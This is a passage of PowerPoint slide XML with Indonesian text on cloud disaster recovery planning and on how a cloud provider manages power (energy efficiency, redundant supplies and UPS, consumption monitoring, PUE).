              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Perencanaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>bencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>masih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>prosedur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>memulihkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, data, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>serta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>berkomunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>pemangku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kepentingan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>validasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>perjanjian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>prosedur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>respons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>insiden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dipertimbangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>cermat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mengevaluasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kemudahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> cloud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Power</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-Cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memprioritaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efisiensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>energi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hemat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>energi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengoptimalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendingin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berlebihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diaktifkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>catu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, generator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> UPS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemantauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melacak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsumsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> real-time di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengoptimalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>boros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>energi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memfasilitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyeimbangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Skalabilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengalokasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dinamis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Efektivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (PUE) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
